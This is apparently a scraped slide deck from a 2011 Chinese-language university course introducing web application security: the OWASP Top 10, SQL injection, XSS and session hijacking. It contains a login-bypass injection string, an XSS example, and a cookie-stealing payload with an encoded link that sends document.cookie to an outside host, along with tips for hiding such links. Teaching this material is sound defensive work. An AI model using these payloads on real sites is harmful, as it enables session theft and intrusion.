Upload
shayna
View
36
Download
3
Embed Size (px)
DESCRIPTION
中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程. 網頁應用程式的安全入門. 日期 : 2011/03/27 講師 : 資工三 張竟 cwebb [dot] tw [at] gmail [dot] com. Agenda. 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session. 2. Agenda. 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session. 3. 不要做 壞事!. 4. 不要被 抓到!. 5. 不要被 抓到!. 6. - PowerPoint PPT Presentation
Citation preview
中央大學電子計算機中心「多媒體與網路應用」資訊推廣課程
網頁應用程式的安全入門
日期 : 2011/03/27講師 : 資工三 張竟 cwebb [dot] tw [at] gmail [dot] com
Agenda
嘴砲OWSAP Top 10
SQL injection
XSS
cookie & session
2
Agenda
嘴砲OWSAP Top 10
SQL injection
XSS
cookie & session
3
不要做壞事!
4
不要被抓到!
5
不要被抓到!
6
不要說我教的
7
Agenda
嘴砲OWSAP Top 10
SQL injection
XSS
cookie & session
8
網頁安全?
早年 vs 現代靜態 vs 動態有程式 就有漏洞 !
9
ways to attack
OS
web server
web application
10
attack scenariosattack web server gain privilege steal informations to attack users
attack other user steal informations execute other attacks
may be composite
11
Agenda
嘴砲OWSAP Top 10
SQL injection
XSS
cookie & session
12
13
OWASP Top 10 - 2010
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
14
OWASP Top 10 - 2010
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
15
OWASP Top 10 - 2010
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
16
OWASP Top 10 - 2010
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
17
Agenda
嘴砲OWSAP Top 10
SQL injection
XSS
cookie & session
18
Injections
駭客的填空遊戲where can attacker inject? database (MySQL, MS SQL, PostgreSQL ... ) no-sql Directory Service (LDAP) system command!!
19
how SQL works in web
login page for example
client web server
sql server
request whit
id and pwd
sele
ct fr
om a
ccou
nt
whe
re `id
`=id
and
`pwd`
=pw
d
retu
rn re
sult
return login
success/failed
20
Why SQL?
廣大使用儲存大量的網站資料injection friendly
21
how injections work?
以 MySQL為例子$query = “select from account where `id`=’$id’ and `pwd`=’$pwd’
$id=’ or 1=1 -- > select from account where `id`=’’ -- ....
22
attack skills
union
blind attack
23
影響
資料被偷 /被改獲得網站權限整個網站被拿下#
24
how to defense
safe API
過濾逃脫字元 不要直接把使用者輸入加入 query
找程式掃描弱點
25
Practice
26
Agenda
嘴砲OWSAP Top 10
SQL injection
XSS
cookie & session
27
XSS
Cross Site Scripting
在別人的網站上寫程式!
28
background knowledge
HTTP GET
HTTP POST
29
how to attack
attack using POST/GET
the “scripting”
in the server
strange url
30
how to attack
javascript
<iframe> / <image>
31
example<body> <? echo “Hello ”.$_GET[‘id’].”; ?></body>
http://goodsite.com/?id=<script>alert(“i’m Orange”)</script>
32
what may happened?
take you to bad site
send your information to attacker
Just For Fun!
33
Just For Fun Samy
MySpace XSS attack
Samy is my hero!
Infection
34
Big Site also XSSable
MySpace
Plurk
...
35
how to defense
for server
該逃的還是要逃
找程式掃描弱點
for user
看到奇怪連結要警覺
瀏覽器 / 防毒軟體
36
practice
37
Agenda
嘴砲OWSAP Top 10
SQL injection
XSS
cookie & session
38
background knowledge
cookie
session
A cookie is a piece of text stored by a user's web browser.A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases. 39
40
41
如果偷到了 cookie可以 ....
42
how to steal it?
43
44
把 cookie送到雲端 !
用 GET / POST方式讓網頁把cookie送走<img> / <iframe> ex: ["<img src='http://in1.ncu.cc/~975002063/keke/t.php?t=",document.cookie," >"].join(
sever side is simplejust keep the cookie
45
哪個白痴會點這鬼連結
http://example.com/?samname=%22%3E%3Cscript%3Edocument.write%28[String.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join%28%29%29;%3C/script%3E%3C%22
46
hidden
有種東西叫短網址 (tinyurl.com / 0rz.tw / goo.gl / bit.ly)
塞進別的網頁裡 (ex: iframe長寬設 0 或 1)
ugly url EVERY WHEREhttps://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1<mpl=default<mplcache=2https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1
47
防範
鎖定 user agent / header
綁 IP
* 不要被攻擊成功 *
48
鎖定 user agent / header
if (isset($_SESSION['HTTP_USER_AGENT'])){ if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) { exit(); }}else{ $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);}
但是 ... 當你偷的到 cookie 會拿不到header 嗎 ?
49
Practice
50
Q&A?
51
end52
Reference
53
http://www.owasp.org/http://en.wikipedia.org/http://goo.gl/cA3ahttp://goo.gl/IwGbXhttp://goo.gl/uQ4I1